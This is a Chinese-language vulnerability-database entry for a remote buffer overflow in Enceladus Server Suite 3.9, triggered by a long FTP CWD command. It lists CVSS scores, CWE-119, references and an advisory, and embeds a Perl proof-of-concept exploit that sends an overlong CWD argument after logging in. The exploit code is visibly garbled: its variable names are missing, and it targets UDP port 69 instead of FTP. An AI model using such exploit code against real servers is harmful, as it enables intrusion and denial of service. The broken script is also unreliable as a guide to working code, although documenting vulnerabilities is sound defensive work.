发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:40

[原文]Buffer overflow in Enceladus Server Suite 3.9 allows remote attackers to execute arbitrary code via a long CD (CWD) command.



- CVSS (基础分值)

CVSS分值: 8.5 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BID  6345
(UNKNOWN)  BUGTRAQ  20021219 Multiple vulnerability in Enceladus Server
(UNKNOWN)  XF  enceladus-cd-bo(10802)
(UNKNOWN)  VULNWATCH  20021209 [SecurityOffice] Enceladus Server Suite v3.9 Buffer Overflow Vulnerability
(UNKNOWN)  BUGTRAQ  20021209 [SecurityOffice] Enceladus Server Suite v3.9 Buffer Overflow Vulnerability

- 漏洞信息

高危 缓冲区溢出
2002-12-31 00:00:00 2002-12-31 00:00:00

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: .

- 漏洞信息 (22081)

Mollensoft Software Enceladus Server Suite 3.9 FTP Command Buffer Overflow (EDBID:22081)
windows dos
2002-12-09 Verified
0 Tamer Sahin
N/A [点击下载]

Enceladus Server Suite is prone to a remotely exploitable buffer overflow vulnerability. It is possible to trigger this condition by supplying an overly long value for several FTP commands. To exploit this issue, the attacker must be able to authenticate to the FTP server included in Enceladus and issue a maliciously crafted command.

Successful exploitation will enable a remote attacker to execute arbitrary code with the privileges of the Enceladus Server Suite software, which will most likely run with SYSTEM (or equivalent) privileges. This vulnerability may also be used to cause a denial of service.

This issue has been reported for Enceladus Server Suite 3.9. Other versions may also be affected.

#!/usr/bin/perl -w

use IO::Socket;

 = "Mollensoft Software Enceladus Server Suite 3.9";

unless (@ARGV == 3) {

 print "\n By Sapient2003\n";

 die "usage: -bash <host to exploit> <user> <password>\n";


print "\n By Sapient2003\n";

 = "A" x 500;

 = "USER [1]\nPASS [2]\nCWD ";

 = IO::Socket::INET->new(

        PeerAddr => [0],

        PeerPort => 69,

        Proto    => "udp",

) or die "Can't find host [0]\n";

print  ;

print "Attempted to exploit [0]\n";


- 漏洞信息

Enceladus Server Suite CD Command Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Vendor Verified, Coordinated Disclosure

- 漏洞描述

Enceladus Server Suite is prone to an overflow condition. The service fails to properly sanitize user-supplied input resulting in a buffer overflow. With a specially crafted overly long CD command, a remote attacker can potentially cause arbitrary code execution.

- 时间线

2002-12-09 Unknow
2002-12-09 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者